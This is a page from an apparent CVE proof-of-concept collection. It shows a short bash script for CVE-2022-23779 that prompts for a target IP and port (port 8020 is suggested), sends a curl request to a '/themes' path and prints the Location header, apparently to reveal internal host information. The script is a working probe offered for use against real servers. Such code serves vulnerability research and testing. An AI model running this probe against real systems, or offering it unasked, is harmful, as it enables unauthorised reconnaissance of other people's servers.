4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2022-23779.sh SH
#!/bin/bash
echo "Enter target address and port. Exploitable port is '8020'. "
read -p "Enter Target IP Address: " IP
read -p "Enter Target Port: " PORT

function GET {
	curl -ILk "https://$IP/themes:$PORT"
}
GET | grep "Location: "